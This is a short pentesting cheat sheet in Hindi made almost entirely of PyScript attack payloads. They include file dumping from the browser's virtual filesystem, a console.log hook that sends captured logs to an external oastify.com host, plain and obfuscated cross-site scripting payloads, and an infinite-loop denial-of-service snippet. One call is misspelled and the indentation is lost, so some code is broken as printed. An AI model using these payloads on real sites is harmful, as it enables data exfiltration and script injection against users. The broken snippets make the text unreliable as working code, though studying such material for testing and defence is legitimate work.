PyScript Pentesting Guide
PyScript एक नया ढांचा है जो HTML में Python को एकीकृत करने के लिए विकसित किया गया है ताकि इसे HTML के साथ उपयोग किया जा सके। इस चीट शीट में, आप अपने पेनटेस्टिंग उद्देश्यों के लिए PyScript का उपयोग कैसे करें, यह पाएंगे।
Emscripten वर्चुअल मेमोरी फाइल सिस्टम से फ़ाइलें डंप करना / पुनः प्राप्त करना:
Copy < py-script >
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read()
print(out)
</ py-script >
Copy < py-script >
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('< script > console .pylog = console .log; console .logs = []; console . log = function (){ console . logs .push ( Array .from (arguments)); console . pylog .apply (console , arguments); fetch ( "http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/" , {method : "POST" , headers : { "Content-Type" : "text/plain;charset=utf-8" } , body : JSON .stringify ({ "content" : btoa ( console .logs)})});}</ script >')
</ py-script >
क्रॉस साइट स्क्रिप्टिंग (सामान्य)
Copy < py - script >
print ( "<img src=x onerror='alert(document.domain)'>" )
</ py - script >
क्रॉस साइट स्क्रिप्टिंग (Python Obfuscated)
Copy < py - script >
sur = "\u0027al" ;fur = "e" ;rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28" ;pic = "\x3Cim" ;pa = "g" ;so = "sr"
e = "c\u003d" ;q = "x"
y = "o" ;m = "ner" ;z = "ror\u003d"
print (pic + pa + " " + so + e + q + " " + y + m + z + sur + fur + rt + s + p)
</ py - script >
क्रॉस साइट स्क्रिप्टिंग (JavaScript ओब्फ़स्केशन)
Copy < py-script >
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</ py-script >
Copy < py-script >
while True:
print(" ")
</ py-script >